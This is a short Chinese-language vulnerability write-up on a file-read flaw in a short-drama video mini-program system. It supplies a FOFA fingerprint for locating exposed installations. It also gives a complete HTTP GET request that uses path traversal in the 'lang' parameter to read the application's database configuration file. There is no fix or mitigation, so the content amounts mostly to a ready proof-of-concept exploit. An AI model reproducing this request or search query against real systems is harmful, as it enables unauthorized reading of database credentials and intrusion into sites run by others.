登录 白背景

小剧场短剧影视系统存在前台Lang文件读取漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);"> 2024年最新新版小剧场短剧影视小程序源码+风口项目 ,短剧APP 小程序源码 风口项目 ,小剧场短剧影视系统存在前台Lang文件读取漏洞。</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • 小剧场短剧影视系统

三、资产测绘

  • fofa"/VwmRIfEYDH.php"
  • 特征

1725184858662-ad360b7b-60cf-466b-be25-53103b85a699.png

四、漏洞复现

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

1725184925981-3437b34f-accf-42a5-be72-03953b7f095b.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rlvup9azeixergbd